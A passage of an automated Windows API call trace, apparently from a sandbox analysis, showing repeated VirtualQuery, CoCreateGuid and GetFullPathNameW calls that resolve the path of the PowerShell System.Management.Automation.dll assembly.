lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.574] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.574] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.574] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.574] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.574] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.574] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.575] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: 
lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.575] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.575] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.575] VirtualQuery (in: lpAddress=0xcb740, lpBuffer=0xcc600, dwLength=0x30 | out: lpBuffer=0xcc600*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.576] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.576] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.576] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.576] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: 
lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.576] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x8bd575a1, Data2=0x29f3, Data3=0x4fcc, Data4=([0]=0xba, [1]=0x8f, [2]=0x51, [3]=0x12, [4]=0xde, [5]=0x6c, [6]=0xf6, [7]=0xc1))) returned 0x0 [0135.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 
[0135.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.577] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xbebc1d59, Data2=0x9ac, Data3=0x48a7, Data4=([0]=0x8b, [1]=0xc2, [2]=0x3e, [3]=0x84, [4]=0x78, [5]=0xde, [6]=0xd4, [7]=0xbd))) returned 0x0 [0135.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, 
lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, 
lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | 
out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.579] VirtualQuery (in: lpAddress=0xcb170, lpBuffer=0xcc030, dwLength=0x30 | out: lpBuffer=0xcc030*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.579] VirtualQuery (in: lpAddress=0xcb170, lpBuffer=0xcc030, dwLength=0x30 | out: lpBuffer=0xcc030*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.579] VirtualQuery (in: lpAddress=0xcb200, lpBuffer=0xcc0c0, 
dwLength=0x30 | out: lpBuffer=0xcc0c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.580] VirtualQuery (in: lpAddress=0xcb170, lpBuffer=0xcc030, dwLength=0x30 | out: lpBuffer=0xcc030*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.580] VirtualQuery (in: lpAddress=0xcb200, lpBuffer=0xcc0c0, dwLength=0x30 | out: lpBuffer=0xcc0c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.580] 
GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.580] GetFullPathNameW 
(in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.581] VirtualQuery (in: lpAddress=0xcb170, lpBuffer=0xcc030, dwLength=0x30 | out: lpBuffer=0xcc030*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.581] VirtualQuery (in: lpAddress=0xcb200, lpBuffer=0xcc0c0, dwLength=0x30 | out: lpBuffer=0xcc0c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb880, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.581] VirtualQuery (in: lpAddress=0xcb170, lpBuffer=0xcc030, dwLength=0x30 | out: lpBuffer=0xcc030*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.581] VirtualQuery (in: lpAddress=0xcb200, lpBuffer=0xcc0c0, dwLength=0x30 | out: lpBuffer=0xcc0c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.582] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.582] GetFullPathNameW (in: 
